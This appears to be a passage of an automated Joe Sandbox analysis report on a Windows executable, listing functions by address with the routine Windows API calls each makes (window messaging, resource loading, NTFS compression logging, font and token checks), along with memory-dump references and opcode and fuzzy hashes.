                                                              • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                              • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                              • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                              • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                              Function 0044E8C4 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                              • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                              • IsRectEmpty.USER32(?), ref: 0044E953
                                                              • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                              • String ID:
                                                              • API String ID: 855768636-0
                                                              • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                              • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                              • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                              • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                              Function 00495924 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                              • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                              • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                              • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: OffsetRect
                                                              • String ID:
                                                              • API String ID: 177026234-0
                                                              • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                              • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                              • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                              • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                              Function 00417218 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCursorPos.USER32 ref: 00417260
                                                              • SetCursor.USER32(00000000), ref: 004172A3
                                                              • GetLastActivePopup.USER32(?), ref: 004172CD
                                                              • GetForegroundWindow.USER32(?), ref: 004172D4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                              • String ID:
                                                              • API String ID: 1959210111-0
                                                              • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                              • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                              • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                              • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                              Function 004955DC Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                              • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                              • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                              • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                              Function 0041F480 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                              • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                              • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                              • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Class$InfoLongRegisterUnregisterWindow
                                                              • String ID:
                                                              • API String ID: 4025006896-0
                                                              • Opcode ID: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                              • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                              • Opcode Fuzzy Hash: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                              • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                              Function 00454F7C Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                              • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                              • String ID:
                                                              • API String ID: 4071923889-0
                                                              • Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                              • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                              • Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                              • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                              Function 0040D010 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                              • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                              • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                              • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                              • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                              • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                              • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                              Function 004019CC Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                              • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                              • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02249ECC,00001CA0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                              • String ID:
                                                              • API String ID: 730355536-0
                                                              • Opcode ID: 303ccfa916ee30606edfd417ee1dfeae8d79d4aa2781d0ec5268568314661242
                                                              • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                              • Opcode Fuzzy Hash: 303ccfa916ee30606edfd417ee1dfeae8d79d4aa2781d0ec5268568314661242
                                                              • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                              Function 004705A0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                              Strings
                                                              • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                              • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                              • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                              • API String ID: 1452528299-3038984924
                                                              • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                              • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                              • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                              • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                              Function 0046FDF4 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                              Strings
                                                              • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                              • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                              • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                              • API String ID: 1452528299-1392080489
                                                              • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                              • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                              • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                              • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                              Function 00455D9C Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                              • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                              • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                              • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                              • String ID:
                                                              • API String ID: 4283692357-0
                                                              • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                              • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                              • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                              • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                              Function 0047CD48 Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CountSleepTick
                                                              • String ID:
                                                              • API String ID: 2227064392-0
                                                              • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                              • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                              • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                              • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                              Function 00478204 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                              • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                              • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                              • String ID:
                                                              • API String ID: 215268677-0
                                                              • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                              • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                              • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                              • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                              Function 00424240 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastActivePopup.USER32(?), ref: 0042424C
                                                              • IsWindowVisible.USER32(?), ref: 0042425D
                                                              • IsWindowEnabled.USER32(?), ref: 00424267
                                                              • SetForegroundWindow.USER32(?), ref: 00424271
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                              • String ID:
                                                              • API String ID: 2280970139-0
                                                              • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                              • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                              • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                              • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                              Function 0040626C Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalHandle.KERNEL32 ref: 0040626F
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                              • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                              • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocHandleLockUnlock
                                                              • String ID:
                                                              • API String ID: 2167344118-0
                                                              • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                              • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                              • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                              • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
